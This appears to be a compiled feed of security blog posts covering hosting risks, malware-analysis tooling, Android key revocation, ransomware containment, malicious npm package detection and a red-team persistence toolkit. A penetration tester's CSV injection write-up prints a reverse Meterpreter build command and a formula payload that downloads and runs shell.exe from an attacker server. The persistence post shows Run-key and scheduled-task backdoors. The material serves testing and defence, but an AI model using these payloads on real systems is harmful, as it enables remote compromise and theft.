  • Frequent security issues. If your website doesn’t have backups and often suffers from various cyberattacks, then you should definitely talk to your provider (after making sure that your passwords aren’t the problem).
  • Regular unexpected downtime. A poor choice of web hosting provider often leads to this problem, which, in turn, is often caused by overloaded servers. In other words, the provider simply can’t handle the volume of visitors that your website (and the other websites hosted on that server) are experiencing.

So, to sum up, the quality of hosting is essential to the success of your online venture, and a poor choice can lead to disappointing outcomes (just remember the figures from the live counter). But with so many websites getting hacked daily, what do you need to know to protect your own? Read the next section to find out.

Beware of these Major Web Hosting Hazards

  1. Shared Hosting Issues

Shared hosting is a tricky business: you don’t know how many websites live on the same server as your own. It’s quite possible that the number is quite high, up to a thousand, and this could be one of the reasons why your website might be underperforming.

For example, one discussion thread had some interesting information on this. A person asked how many websites are typically served by one shared server, and some of the answers were astonishing. For example, one user responded by writing the following.

Can you believe it? 800 websites on one server! Talk about performance issues, right?

While I realize that a single server can host up to several thousand websites, can you imagine what would happen if at least ten of them are high-traffic ones? Think crashes, slow loading times, unplanned downtime, and lots of other issues.

Since people are always looking to save costs, chances are that shared hosting issues will continue to impact a lot of websites.

  2. Attacks That Exploit an Outdated Version of PHP

It’s a known fact that about 80 percent of all websites in 2018 ran on PHP. However, at the beginning of 2019, support for PHP 5.6.x ended, meaning that all support for any version of PHP 5.x is gone. In other words, sites that fail to update won’t get any security patches, bug fixes, or updates.

However, recent reports suggest that this news didn’t trigger any massive move to newer versions of PHP. For example, according to Threat Post, about 62 percent of all websites using server-side programming are still running PHP version 5. Here is the full data.

Source: Threat Post

“These sites probably include old libraries that haven’t had the joy of an update…” the abovementioned Threat Post piece cited a web security expert as saying. “The libraries probably have bugs and security holes in themselves, never mind the hosting platform or the website code itself. In some cases library code can be updated easily, others not.”

For hackers looking for some business, this means that they have a lot of work to do. Can you imagine it: since the beginning of this year, more than 60 percent of websites have stopped getting security updates!

“Faced with the urgent requirement to update their PHP version, a lot of website owners will make a corresponding request to their web hosting providers,” shares Sam Bridges, a web security specialist from Trust My Paper. “This means that the latter will face a flood of support requests, which could translate into a slow update process.”

On top of that, some providers may not be willing to notify their users about the need to update their PHP versions, so a lot of websites may still be running outdated ones for the next few years.

Well, hopefully you’re not going to be one of them.

  3. More Sophisticated DDoS Attack Techniques

DDoS attacks are nothing new, but they remain a common type of cyberweapon used against websites and should be considered when choosing a hosting provider. In fact, the situation is a lot more complicated than one might think.

For example, research suggests that the total number of DDoS attacks decreased by 13 percent in 2018, which may seem like a positive signal to many.

The comparison of the number of DDoS attacks between 2017 and 2018. Source: Kaspersky

Unfortunately, the stats don’t provide the big picture here. According to Kaspersky, hackers are reducing the number of attempts to break into websites using DDoS attacks, but they are turning to more advanced and sophisticated attack techniques.

For example, it was found that the average length of an attack increased from 95 minutes in the first quarter of 2018 to 218 minutes in the fourth quarter. While this means that protection against this kind of attack is getting better, it also suggests that the malefactors are becoming more selective and skilled.


For example, 2018 saw the biggest DDoS attacks in history; one of them involved a U.S.-based website that reported a 1.7 Tb/s assault (this means that the attackers overwhelmed the site with a massive wave of traffic hitting 1.7 terabits per second!), according to The Register.

Source: The Register

Therefore, we may see an increase in unresponsive websites due to DDoS attacks in the coming years (clearly, not a lot of websites can survive an attack like this one) as hackers deploy more sophisticated techniques.

Since a lack of DDoS-protected hosting is a major risk factor in this situation, make sure that your hosting provider has this protection in place.

Stay Protected

Web hosting is not the first thing that many website owners think about when setting up their businesses, but it’s definitely one that could make or break them. The success of your venture ultimately depends on the uptime, loading time, and overall reliability of your website, so being aware of the threats you may face in the near future could help you avoid losing your website and joining the 100,000+ unfortunate site owners who get their sites hacked every day.

Hopefully, this article was a useful introduction to the importance of web hosting and the risks that come with it. Remember: if you want your data to be protected, pay attention to the existing and emerging risks right now and make appropriate decisions. Eventually, this will pay off nicely by maximizing the uptime and reliability of your website.


Dorian Martin is a frequent blogger and an article contributor to a number of websites related to digital marketing, AI/ML, blockchain, data science and all things digital. He is a senior writer at WoWGrade, runs a personal blog NotBusinessAsUsusal and provides training to other content writers.

The post Major Web Hosting Hazards You Should Take Seriously appeared first on CyberDB.

Open Sourcing StringSifter

Malware analysts routinely use the Strings program during static analysis in order to inspect a binary's printable characters. However, identifying relevant strings by hand is time consuming and prone to human error. Larger binaries produce upwards of thousands of strings that can quickly evoke analyst fatigue, relevant strings occur less often than irrelevant ones, and the definition of "relevant" can vary significantly among analysts. Mistakes can lead to missed clues that would have reduced overall time spent performing malware analysis, or even worse, incomplete or incorrect investigatory conclusions.

Earlier this year, the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams published a blog post describing a machine learning model that automatically ranked strings to address these concerns. Today, we publicly release this model as part of StringSifter, a utility that identifies and prioritizes strings according to their relevance for malware analysis.


StringSifter is built to sit downstream from the Strings program; it takes a list of strings as input and returns those same strings ranked according to their relevance for malware analysis as output. It is intended to make an analyst's life easier, allowing them to focus their attention on only the most relevant strings located towards the top of its predicted output. StringSifter is designed to be seamlessly plugged into a user’s existing malware analysis stack. Once its GitHub repository is cloned and installed locally, it can be conveniently invoked from the command line with its default arguments according to:

strings <sample_of_interest> | rank_strings

We are also providing Docker command line tools for additional portability and usability. For a more detailed overview of how to use StringSifter, including how to specify optional arguments for customizable functionality, please view its README file on GitHub.

We have received great initial internal feedback about StringSifter from FireEye’s reverse engineers, SOC analysts, red teamers, and incident responders. Encouragingly, we have also observed users at the opposite ends of the experience spectrum find the tool to be useful – from beginners detonating their first piece of malware as part of a FireEye training course – to expert malware researchers triaging incoming samples on the front lines. By making StringSifter publicly available, we hope to enable a broad set of personas, use cases, and creative downstream applications. We will also welcome external contributions to help improve the tool’s accuracy and utility in future releases.


We are releasing StringSifter to coincide with our presentation at DerbyCon 2019 on Sept. 7, and we will also be doing a technical dive into the model at the Conference on Applied Machine Learning for Information Security this October. With its release, StringSifter will join FLARE VM, FakeNet, and CommandoVM as one of many recent malware analysis tools that FireEye has chosen to make publicly available. If you are interested in developing data-driven tools that make it easier to find evil and help benefit the security community, please consider joining the FDS or FLARE teams by applying to one of our job openings.

ACSC confirms the public release of BlueKeep exploit

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) is aware of the overnight release of a working exploit for the vulnerability known as BlueKeep (CVE-2019-0708). Australian businesses and users of older versions of Windows should update their systems as soon as practically possible, before hackers further refine their tools and tradecraft in order to fully utilise this exploit.

Trust but verify attestation with revocation

Posted by Rob Barnes & Shawn Willden, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]

Billions of people rely on their Android-powered devices to securely store their sensitive information. A vital component of the Android security stack is the key attestation system. Android devices since Android 7.0 are able to generate an attestation certificate that attests to the security properties of the device’s hardware and software. OEMs producing devices with Android 8.0 or higher must install a batch attestation key provided by Google on each device at the time of manufacturing.
These keys might need to be revoked for a number of reasons including accidental disclosure, mishandling, or suspected extraction by an attacker. When this occurs, the affected keys must be immediately revoked to protect users. The security of any Public-Key Infrastructure system depends on the robustness of the key revocation process.
All of the attestation keys issued so far include an extension that embeds a certificate revocation list (CRL) URL in the certificate. We found that the CRL (and online certificate status protocol) system was not flexible enough for our needs. So we set out to replace the revocation system for Android attestation keys with something that is flexible and simple to maintain and use.
Our solution is a single TLS-secured URL that returns a list containing all revoked Android attestation keys. This list is encoded in JSON and follows a strict format defined by a JSON schema. Only keys that have a non-valid status appear in the list, so it is not an exhaustive list of all issued keys.
This system allows us to express more nuance about the status of a key and the reason for the status. A key can have a status of REVOKED or SUSPENDED, where revoked is permanent and suspended is temporary. The reason for the status is described as either KEY_COMPROMISE, CA_COMPROMISE, SUPERSEDED, or SOFTWARE_FLAW. A complete, up-to-date list of statuses and reasons can be found in the developer documentation.
The CRL URLs embedded in existing batch certificates will continue to operate. Going forward, attestation batch certificates will no longer contain a CRL extension. The status of these legacy certificates will also be included in the attestation status list, so developers can safely switch to using the attestation status list for both current and legacy certificates. An example of how to correctly verify Android attestation keys is included in the Key Attestation sample.
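As a sketch of what consuming such a status list might look like, the snippet below parses a JSON document in the spirit described above and looks up a certificate's status. The structure, field names, and serial numbers here are illustrative assumptions, not the actual schema; consult the developer documentation and the Key Attestation sample for the real format.

```python
import json

# Hypothetical excerpt of an attestation status list. The real list is
# served from a TLS-secured URL and follows a strict JSON schema; the
# layout and serial numbers below are illustrative only.
STATUS_LIST_JSON = """
{
  "entries": {
    "2c8cdddfd5e03bfb": {"status": "REVOKED",   "reason": "KEY_COMPROMISE"},
    "c8966fcb2fbb0d7a": {"status": "SUSPENDED", "reason": "SOFTWARE_FLAW"}
  }
}
"""

def key_status(status_list: str, serial_hex: str):
    """Return (status, reason) for a certificate serial, or None if the
    serial is absent (absence means the key has no non-valid status)."""
    entries = json.loads(status_list)["entries"]
    entry = entries.get(serial_hex.lower())
    return (entry["status"], entry["reason"]) if entry else None

print(key_status(STATUS_LIST_JSON, "2C8CDDDFD5E03BFB"))  # → ('REVOKED', 'KEY_COMPROMISE')
print(key_status(STATUS_LIST_JSON, "ffffffffffffffff"))  # → None
```

Note how this model captures the nuance described above: a SUSPENDED key can later drop off the list when the suspension is lifted, while a REVOKED key stays permanently.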

Data Extraction to Command Execution CSV Injection

As web applications get more complex and more data driven, the ability to extract data from a web application is becoming more common. I work as a principal penetration tester on Veracode’s MPT team, and the majority of web applications that we test nowadays have the ability to extract data in CSV format. The most common software installed in corporate environments is Microsoft Excel, and this software can open CSV files (in most cases, it is the default handler). It should be noted that this type of attack would also affect LibreOffice, as it would also interpret the payload as a formula.

Attack Requirements

In order to perform a basic attack, a number of requirements must be met. An attacker needs the ability to inject a payload into the tables within the application, and the application needs to allow a victim to download this data in CSV format that can then be opened in Excel. This causes the payload to be interpreted as an Excel formula and run.

Basic Attack

1. Search the application to find a location where any data input can be extracted.

2. Inject the payload =HYPERLINK(" ", "Click for Report")

3. Confirm the application is vulnerable to this type of attack. Extract the data and confirm the payload has been injected by opening the CSV file in Microsoft Excel.

4. You can then see a “Click for Report” link in the Excel file. This indicates the payload has been injected correctly.

In this scenario, when the victim clicks on the link, it will take them to the Veracode website. This type of attack might not seem too serious, but consider the following:

Instead of redirecting the end user to the Veracode website, we could redirect them to a server we control, which contains a clone of the website. We could then ask the victim to authenticate to our clone, allowing us as the attacker to steal his or her credentials. We could then use these credentials on the original website and have access to all of the victim’s personal information and any functionality the account has access to. There are also a number of other attacks possible with this type of formula injection, including exfiltrating sensitive data, obtaining remote code execution, or even reading the contents of certain files under the right circumstances. We can look at one of these types of attacks below.
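On the defensive side, the standard mitigation for this whole class of formula injection is to neutralize cells that begin with a formula-triggering character before they reach the exported CSV. The sketch below is my own illustration, not part of the attack walkthrough; the helper names and the attacker URL are assumptions.

```python
import csv
import io

# Characters that make Excel/LibreOffice treat a CSV cell as a formula.
FORMULA_TRIGGERS = ('=', '+', '-', '@', '\t', '\r')

def sanitize_cell(value: str) -> str:
    """Prefix risky cells with a single quote so spreadsheet software
    renders the payload as inert text instead of evaluating it."""
    if value and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value

def export_csv(rows) -> str:
    """Write rows to CSV, sanitizing every cell on the way out."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    for row in rows:
        writer.writerow([sanitize_cell(str(cell)) for cell in row])
    return buf.getvalue()

# Hypothetical attacker-controlled URL, for illustration only.
payload = '=HYPERLINK("http://attacker.example/", "Click for Report")'
print(export_csv([["name", "note"], ["alice", payload]]))
```

Prefixing with a single quote makes the spreadsheet render the cell as literal text; stricter exporters reject such input outright rather than escaping it. Note that this blanket rule also escapes legitimate values such as negative numbers, a tradeoff to weigh per application.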

Advanced Attack – Remote Command Execution

A more advanced attack would use the same method as above but with a different payload, which would lead to remote code execution. This type of attack does depend on a number of factors and might not always be possible. However, it’s still worth considering and also highlights how serious this vulnerability can be under the right circumstances.

Attack in Steps

1. We’ll use a shell.exe file, which can contain whatever we want to execute on the system; in this scenario, we will use msfvenom to create a reverse Meterpreter payload.

msfvenom -p windows/meterpreter/reverse_tcp  -a x64 --platform Windows LHOST=<IP Address> LPORT=1234 -f exe > shell.exe

2. We also need to set up a listener that will wait for the connect back to us once the shell.exe payload has been executed on the victim’s machine. We will use Metasploit multi/handler for this example. We need to set the LPORT and also make sure the IP address is correct.

3. We also need to host the shell.exe payload so it can be downloaded. For this, I used the following command, python -m SimpleHTTPServer 1337 (on Python 3, python3 -m http.server 1337), which sets up a simple web server in the current directory on my system. A real attack might host this on a compromised web server.

4. Once all this has been set up, we could then inject the payload into the application and wait for a victim to download the CSV file and click on the cell with the payload in it.

=cmd|' /C powershell Invoke-WebRequest "http://evilserver:1337/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Breakdown of Payload

  • The payload first calls cmd, which passes the PowerShell Invoke-WebRequest command to download a shell.exe file from our evilserver on port 1337. Note that if the host is running PowerShell version 2, Invoke-WebRequest won’t work, as it was introduced in PowerShell 3.0.
  • The -OutFile parameter saves the shell.exe file into the temp directory. We use the temp directory because it’s a folder any user can write to.
  • Start-Process then executes the downloaded shell.exe payload.

5. Once the victim opens the file, the CSV injection payload runs. However, it may present a “Remote Data Not Accessible” warning. Chances are that most victims will assume the file comes from a legitimate source and select Yes to view the data. It should also be noted that in this scenario the Excel file is empty apart from our payload. In a real-world attack, the Excel file would be populated with information from the application.

6. Once the victim selects yes, within a few moments, Metasploit will get a reverse connect from the victim’s host.

7. At this point, the attacker can perform a number of tasks depending on the level of access he or she has obtained. This includes, but is not limited to, stealing passwords in memory, attacking other systems on the network (if this host is connected to one), taking over users’ webcams, and so on. In fact, under the right circumstances, it would be possible to compromise an entire domain using this attack.

When testing for CSV injection, a tester will in most instances use a simple payload, for a number of reasons. It’s not uncommon for a tester to demonstrate this type of attack using a hyperlink payload like the one above, or a simple cmd payload like the following: =cmd|' /C cmd.exe'!A1

Some might also use the following payload, depending on the operating system: ='file:///etc/passwd'#$passwd.A1

This would read the first line of the /etc/passwd file on a Linux system.

Mitigating the Risk

The best way to mitigate this type of attack is to filter all user input so that only expected characters are allowed. Client-supplied input should always be considered unsafe and treated with caution when processed. Like many other classes of web attack, CSV injection is a side effect of weak input validation, so a default-deny (“whitelist”) regular expression should be used to filter all data that is submitted to the application. Because Excel and CSV files treat equals signs (=), plus signs (+), minus signs (-), and “at” symbols (@) as the start of formulas, we recommend filtering these out to ensure no cell begins with these characters. Any element that could appear in an exported report is a potential target for Excel/CSV injection and should be further validated.
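As a minimal sketch of that recommendation (an illustration, not production code, and escaping rather than rejecting input), an exporter can prefix a single quote to any cell that begins with a formula-trigger character so spreadsheet software treats the value as literal text. Tab and carriage return are included because they are also commonly listed as triggers:

```python
# Characters that cause Excel/LibreOffice to treat a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def sanitize_cell(value: str) -> str:
    """Neutralize CSV/Excel formula injection by prefixing a single
    quote, so spreadsheet software renders the cell as plain text."""
    if value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value

print(sanitize_cell('=HYPERLINK(" ", "Click for Report")'))
print(sanitize_cell("regular comment"))
```

Apply this to every user-influenced value at export time, in addition to (not instead of) whitelist validation at input time.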

In summary, CSV injection is not a new attack vector, but it’s one that developers often forget about. As more web applications have the ability to extract data, it’s one that could have serious consequences if steps are not taken to mitigate the risk it poses. In addition, developers should be checking user input for other types of attacks like XSS.


Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization, including the loss of access to data and systems, and operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls, can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

Ransomware is commonly deployed across an environment in two ways:

  1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
    • Manually run encryptors on targeted systems.
    • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
    • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
    • Deploy encryptors with existing software deployment tools utilized by the victim organization.
  2. Automated propagation:
    • Credential or Windows token extraction from disk or memory.
    • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
    • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).
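For defenders studying detection opportunities, the batch-file deployment pattern in method 1 boils down to three commands; the sketch below only builds them as strings (the hostname, account, and paths are hypothetical) rather than executing anything:

```python
# Hypothetical target and paths illustrating the batch-file deployment
# pattern: mount the C$ admin share, copy the encryptor, run it via PsExec.
target = "WORKSTATION01"
encryptor = "encryptor.exe"

commands = [
    # 1. Mount the administrative share with stolen admin credentials.
    rf"net use \\{target}\C$ /user:DOMAIN\admin",
    # 2. Copy the encryptor onto the target.
    rf"copy {encryptor} \\{target}\C$\Windows\Temp\{encryptor}",
    # 3. Execute it remotely with the Sysinternals PsExec tool.
    rf"psexec \\{target} -d C:\Windows\Temp\{encryptor}",
]
for cmd in commands:
    print(cmd)
```

Each of these steps leaves telemetry (share mounts, SMB file writes, PSEXESVC service creation) that endpoint monitoring can alert on.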

The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

  • Endpoint segmentation
  • Hardening against common exploitation methods
  • Reducing the exposure of privileged and service accounts
  • Cleartext password protections

If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

Read the report today.

*Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

Discovering Malicious Packages Published on npm

Sightings of malicious packages on popular open source repositories (such as npm and RubyGems) have become increasingly common: just this year, there have been several reported incidents.

This method of attack is frighteningly effective given the widespread reach of popular packages, so we've started looking into ways to discover malicious packages to hopefully preempt such threats.

The problem

In November 2018, a malicious package named “flatmap-stream” was discovered as a transitive dependency of a popular library, “event-stream,” with 1.4 million weekly downloads. Here, the attacker gained publishing rights through social engineering, targeting a package that was not regularly maintained. The attacker published an updated version, “3.3.6,” adding malicious code to steal cryptocurrency. This went undetected for two to three months.

In a separate incident from June 2019, a malicious package “electron-native-notify” was discovered to be stealing sensitive information, such as cryptocurrency wallet seeds and other credentials. The attacker waited for the package to be consumed by another popular library before introducing malicious code into subsequent releases. This was also undetected for two to three months.

Detection of the problem

Malicious packages tend to exhibit a number of common patterns. To understand them, we looked at a past research paper, “Static Detection of Application Backdoors,” as well as publicly reported incidents, and came up with the following list.


Hiding of payloads

Malicious packages tend to hide payloads using encoding methods such as base64 and hex. The corresponding APIs are typically used only by libraries that implement low-level protocols or provide utility functions, so finding them elsewhere is a good indicator that a package deserves scrutiny.
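As a rough illustration of this heuristic (the regex and length threshold are our own choices, not a production scanner), one can flag long base64-looking string literals in source code:

```python
import re

# Long runs of base64-alphabet characters are rare in ordinary
# application strings but common in encoded payloads.
BASE64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{40,}={0,2})["\']')

def suspicious_literals(source: str) -> list:
    """Return string literals that look like base64-encoded blobs."""
    return BASE64_LITERAL.findall(source)

benign = 'const greeting = "hello world";'
shady = 'eval(atob("dmFyIHggPSByZXF1aXJlKCJodHRwIik7IHguZ2V0KCJldmlsIik7"));'

print(suspicious_literals(benign))
print(len(suspicious_literals(shady)))
```

A real detector would work on the parsed abstract syntax tree rather than raw text, but the signal is the same.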

Reading of sensitive information

Sensitive information is data from the environment that libraries should only read with good reason. This includes files like “/etc/shadow,” “~/.aws/credentials,” and SSH private keys.

Exfiltration of information

Libraries are unlikely to contact hardcoded external servers; this is something more commonly done in downstream applications. Malicious libraries tend to do this to exfiltrate information, so we look for such occurrences.

Remote code execution

A pre-install or post-install script is a convenient way of running arbitrary code on a victim's machine. Payloads may also be downloaded from external sources.
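A simplified check for this pattern (the manifest below is a made-up example) flags packages whose package.json declares install-time lifecycle scripts:

```python
import json

# npm runs these lifecycle scripts automatically during "npm install",
# making them a favorite hook for malicious payloads.
INSTALL_HOOKS = {"preinstall", "install", "postinstall"}

def install_scripts(package_json: str) -> dict:
    """Return any install-time lifecycle scripts declared in package.json."""
    manifest = json.loads(package_json)
    scripts = manifest.get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}

manifest = '''{
  "name": "node-ftp-lookalike",
  "scripts": {
    "postinstall": "node payload.js",
    "test": "mocha"
  }
}'''
print(install_scripts(manifest))
```

Install scripts have many legitimate uses (e.g., building native addons), so this check narrows candidates rather than proving malice.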


Typo-squatting

While typo-squatted packages are not always malicious, they are a red flag. We deem typo-squatted packages malicious, since they may provide the exact same functionality and interface as the original, and may introduce a payload once other popular packages come to depend on them.

Implementation of a detector for malicious packages

To find malicious packages in the wild, we wrote specific, lightweight static analyses for each pattern and ran them over our dataset of npm packages, looking for packages flagged by one or more detectors. False positives were expected; the plan was to narrow the number of candidates to the point where manual verification was feasible.

Two example analyses:

  • To find hardcoded external URLs, we extracted URL-like string literals from the abstract syntax trees of JavaScript source files.
  • To detect typo-squatting, we looked for package names within a Levenshtein distance of 2 of the names of the top 1,000 packages, e.g., “mogobd” vs. “mongodb.”

We ran these only on the latest versions of packages.
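The typo-squatting check can be sketched as follows. Note that the “mogobd” vs. “mongodb” example implies a transposition-aware (Damerau-Levenshtein, optimal string alignment) distance, so that is what this minimal implementation computes; the three-package popular list is a stand-in for the top 1,000:

```python
def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insert/delete/substitute
    plus adjacent-character transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,        # deletion
                          d[i][j - 1] + 1,        # insertion
                          d[i - 1][j - 1] + cost) # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[-1][-1]

POPULAR = {"mongodb", "express", "lodash"}  # stand-in for the top 1,000 list

def possible_typosquat(name: str) -> bool:
    """Flag names within 2 edits of a popular package (excluding exact matches)."""
    return any(0 < damerau_levenshtein(name, p) <= 2 for p in POPULAR)

print(possible_typosquat("mogobd"))   # "mongodb" is 2 edits away
print(possible_typosquat("mongodb"))  # exact match, distance 0
```

Exact matches are excluded so the popular packages themselves are not flagged.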


The full analysis took less than a day and uncovered 17 new malicious packages:

* axioss

* axios-http

* body-parse-xml

* sparkies

* js-regular

* file-logging

* mysql-koa

* import-mysql

* mogodb

* mogobd

* mogoose

* mogodb-core

* node-ftp

* serializes

* serilize

* koa-body-parse

* node-spdy

We disclosed these malicious packages to the npm security team, and they were yanked from the registry.

Most of the malicious packages above hide their payloads as a “test” and use pre-/post-/test-install scripts to exfiltrate information. For example, “node-ftp” exposes the host information of the victim by sending the values of “os.hostname(),” “os.type(),” “os.uptime(),” and “os.tmpdir()” to its server.

This activity of finding undetected malicious packages has further confirmed our suspicions of the existence of harmful libraries out in the open, and is only the beginning of our quest to efficiently overturn all stones to reduce potential threats. To do this, we intend to perform more regular, automated, and thorough audits on public packages, then generalize these techniques for other package managers like RubyGems.

SharPersist: Windows Persistence Toolkit in C#


PowerShell has been used by the offensive community for several years now, but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advances include Script Block Logging, the Antimalware Scan Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits, such as Seatbelt, SharpUp, and SharpView, have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows persistence toolkit created by FireEye Mandiant’s Red Team called SharPersist.

Windows Persistence

During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1.

Figure 1: FireEye Attack Lifecycle Diagram

Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lay dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service. There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, the registry, and the startup folder, and more continue to be discovered. For a more thorough list, see the MITRE ATT&CK persistence page.

Figure 2: Persistence equation

SharPersist Overview

SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike’s “execute-assembly” functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built-in to the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden.

SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page.

SharPersist Persistence Techniques

There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3.



  • KeePass: backdoors the KeePass configuration file
  • New Scheduled Task: creates a new scheduled task
  • New Windows Service: creates a new Windows service
  • Registry: registry key/value creation/modification
  • Scheduled Task Backdoor: backdoors an existing scheduled task with an additional action
  • Startup Folder: creates an LNK file in the user startup folder
  • Tortoise SVN: creates a Tortoise SVN hook script

Figure 3: Table of supported persistence techniques, with each technique’s switch name (-t), whether admin privileges are required, whether it touches the registry, and whether it adds or modifies files on disk

SharPersist Examples

On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below.

Registry Persistence

The first technique that will be highlighted is the registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4.

Figure 4: Supported registry keys table. For each registry key code (-k), the table lists the registry key, the registry value, whether admin privileges are required, and whether the env optional add-on (-o env) is supported. Several entries take a user-supplied registry value, and the supported keys include HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.

In the following example, we will validate our arguments and then add registry persistence. Performing a validation before adding the persistence is a best practice: it confirms that you have supplied the correct arguments and passes other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named “Test” with the value “cmd.exe /c calc.exe” in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key.

Figure 5: Adding registry persistence
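For context, the registry persistence in Figure 5 is equivalent to a reg.exe invocation against the current user’s Run key. The sketch below (not SharPersist syntax) only constructs that command as a string rather than executing it:

```python
def run_key_command(value_name: str, payload: str) -> str:
    """Build a reg.exe command that adds a value to the current user's
    Run key, the registry location used in the Figure 5 example."""
    run_key = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
    return f'reg add "{run_key}" /v {value_name} /t REG_SZ /d "{payload}" /f'

# Same value name and payload as the Figure 5 example.
cmd = run_key_command("Test", "cmd.exe /c calc.exe")
print(cmd)
```

Anything written to this key is executed at the user’s next logon, which is exactly the trigger/implant split described earlier: the Run key is the trigger, and the payload command is the implant.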

Once the persistence needs to be removed, it can be removed using the “-m remove” argument, as shown in Figure 6. We are removing the “Test” registry value that was created previously, and then we are listing all registry values in “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” to validate that it was removed.

Figure 6: Removing registry persistence

Startup Folder Persistence

The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called “Test.lnk” that will be placed in the current user’s startup folder and will execute “cmd.exe /c calc.exe”, shown in Figure 7.

Figure 7: Performing dry-run and adding startup folder persistence

The startup folder persistence can then be removed, again using the “-m remove” argument, as shown in Figure 8. This will remove the LNK file from the current user’s startup folder.

Figure 8: Removing startup folder persistence

Scheduled Task Backdoor Persistence

The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9.

Figure 9: Listing scheduled tasks that run at logon

Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will successfully work and then actually execute the command as shown in Figure 10.

Figure 10: Performing dry run and adding scheduled task backdoor persistence

As you can see in Figure 11, the scheduled task is now backdoored with our malicious action.

Figure 11: Listing backdoored scheduled task

A backdoored scheduled task action used for persistence can be removed as shown in Figure 12.

Figure 12: Removing backdoored scheduled task action


Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community and persistence is no exception. Windows provides multiple techniques for persistence and there will continue to be more discovered and used by security professionals and adversaries alike.

This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell.

Tips for Kicking Off Your Veracode Security Program Manager Relationship

